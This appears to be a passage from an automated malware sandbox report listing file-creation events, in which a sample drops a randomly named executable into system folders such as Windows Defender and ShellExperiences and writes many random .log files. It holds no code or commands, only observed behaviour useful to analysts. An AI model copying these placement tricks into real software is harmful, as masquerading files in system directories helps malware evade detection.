                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\UYcyJOZf.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\GKfLNjlY.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\OqbZUiZT.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\CqTJEOHT.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\KFhcUPbS.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\QYBPfZgq.logJump to dropped file
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeFile created: C:\Program Files\Windows Defender\oqWNZWQNWoNnROlqjKcKhLM.exeJump to dropped file
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeFile created: C:\Users\user\Desktop\TraZorfO.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\nimHpzUe.logJump to dropped file
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeFile created: C:\Windows\ShellExperiences\oqWNZWQNWoNnROlqjKcKhLM.exeJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\LWkTXfAf.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\pafNrbGf.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\lgAYTQQj.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\mFCPuWEK.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\abhXZtjw.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\olpMFKgz.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\rsUNXSTy.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\CnRDnDvx.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\pqhfBjOC.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\sSNMOgTF.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\XOEIXFmQ.logJump to dropped file
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeFile created: C:\Users\user\Desktop\NqOhhczU.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\OgVBQDTo.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\hxXYHhry.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\JEwTrooN.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\ACAUZvYN.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\xhGuwiIZ.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\CGsDyrOn.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\KpuBgggp.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\LcQaEBDP.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\rlBOrtmg.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\IPEdAXAX.logJump to dropped file
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeFile created: C:\Program Files\Windows Multimedia Platform\oqWNZWQNWoNnROlqjKcKhLM.exeJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\udSmiqlo.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\ARClkDgk.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\rdSwMKLb.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\RyZipATO.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\FCcCDjRB.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\gMZpSqzV.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\ijuwfDOX.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\dSJhnlvh.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\mBLWrFnw.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\VxlkbjYv.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\unoxMcqb.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\FTyBLKyM.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\PthzQDco.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\nlafNFtr.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\FvOMJVpt.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\lvRXXeLO.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\GxRSZgBO.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\NgGUXyfg.logJump to dropped file
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeFile created: C:\Users\user\Desktop\WhRPvofH.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\vfTLbyDe.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\NvmJyloG.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\VuurXSIi.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\RONsALFU.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\BXwkEeIS.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\VijSQbQY.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\UTTISNjC.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\PFIKyDTH.logJump to dropped file
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeFile created: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\SeerDZBz.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\xMZKLDLb.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\vPiVwyIZ.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\jpnvyeqG.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\gUKxCZnk.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\AHwNgZaF.logJump to dropped file
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeFile created: C:\Users\user\Desktop\gHANBhKj.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\zlxdWeyz.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\UCgheeoa.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\axOHLXft.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\eCWwWibS.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\CyIkUInh.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\uZZMHXbv.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\OkvSnMWj.logJump to dropped file
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeFile created: C:\Users\user\Desktop\MtmZLckZ.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\eulplymD.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\xtgFehys.logJump to dropped file
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeFile created: C:\Users\user\Desktop\zZntUmUz.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\zdNKrvXu.logJump to dropped file
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeFile created: C:\Users\user\Desktop\VcGpvFqH.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\WQvQoNyx.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\wbMvdGfr.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\GLOjgbXG.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\nyDFtNQJ.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\OwGrvDOt.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\TvAqLAiJ.logJump to dropped file
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeFile created: C:\Users\user\Desktop\sbztrXaK.logJump to dropped file
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeFile created: C:\Users\user\Desktop\hhWvCZxk.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\EZPbybNn.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\CvAVSmWD.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\XaOgexda.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\SmOJiIbE.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\lkpWjeGm.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\PYmimUsi.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\qDdNmCtS.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\UTCgmFWk.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\FxClgbOG.logJump to dropped file
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeFile created: C:\Users\user\Desktop\PAkihvfV.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\jKmGQQAV.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\phiwHSJM.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\YMBsdaAI.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\cCsjkXAC.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\YBagvbJq.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\SIxHSvEB.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\yYBvlMUk.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\iLUfkInD.logJump to dropped file
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeFile created: C:\Users\user\Desktop\jsgdIvVc.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\ObZHJZRv.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\LqfKJGTv.logJump to dropped file
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeFile created: C:\Program Files\Internet Explorer\en-GB\oqWNZWQNWoNnROlqjKcKhLM.exeJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\iqYOFZDy.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\lHcvfWDY.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\GoybbFob.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\YPpRAgYW.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\IHWAbonb.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\qZdxwwVX.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\cxwpdtyJ.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\YWHQgFFn.logJump to dropped file
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeFile created: C:\Users\user\Desktop\CKTJbAfr.logJump to dropped file
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeFile created: C:\Windows\ShellExperiences\oqWNZWQNWoNnROlqjKcKhLM.exeJump to dropped file
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeFile created: C:\Users\user\Desktop\PAkihvfV.logJump to dropped file
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeFile created: C:\Users\user\Desktop\NqOhhczU.logJump to dropped file
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeFile created: C:\Users\user\Desktop\hhWvCZxk.logJump to dropped file
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeFile created: C:\Users\user\Desktop\WhRPvofH.logJump to dropped file
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeFile created: C:\Users\user\Desktop\VcGpvFqH.logJump to dropped file
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeFile created: C:\Users\user\Desktop\MtmZLckZ.logJump to dropped file
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeFile created: C:\Users\user\Desktop\CKTJbAfr.logJump to dropped file
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeFile created: C:\Users\user\Desktop\sbztrXaK.logJump to dropped file
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeFile created: C:\Users\user\Desktop\jsgdIvVc.logJump to dropped file
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeFile created: C:\Users\user\Desktop\TraZorfO.logJump to dropped file
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeFile created: C:\Users\user\Desktop\zZntUmUz.logJump to dropped file
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeFile created: C:\Users\user\Desktop\gHANBhKj.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\CqTJEOHT.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\ObZHJZRv.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\GxRSZgBO.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\olpMFKgz.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\eCWwWibS.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\UTCgmFWk.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\LljRCdQC.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\udSmiqlo.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\jpnvyeqG.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\QYBPfZgq.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\AWvLLWqc.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\xMZKLDLb.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\OqbZUiZT.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\abhXZtjw.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\RyZipATO.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\zlxdWeyz.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\qDdNmCtS.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\gUKxCZnk.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\VggGSNtC.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\EZPbybNn.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\lHcvfWDY.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\TvAqLAiJ.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\IHWAbonb.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\zdNKrvXu.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\UYcyJOZf.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\XaOgexda.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\OwGrvDOt.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\FTyBLKyM.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\vfTLbyDe.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\mBLWrFnw.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\VuurXSIi.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\BXwkEeIS.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\iLUfkInD.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\PthzQDco.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\GLOjgbXG.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\xhGuwiIZ.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\ijuwfDOX.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\YBagvbJq.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\GoybbFob.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\phiwHSJM.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\WQvQoNyx.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\LcQaEBDP.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\CyIkUInh.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\axOHLXft.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\UTTISNjC.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\SIxHSvEB.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\CGsDyrOn.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\sSNMOgTF.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\ACAUZvYN.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\iqYOFZDy.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\YHFyVwyQ.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\PYmimUsi.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\UCgheeoa.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\YPpRAgYW.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\OgVBQDTo.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\FxClgbOG.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\vPiVwyIZ.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\nlafNFtr.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\cxwpdtyJ.logJump to dropped file
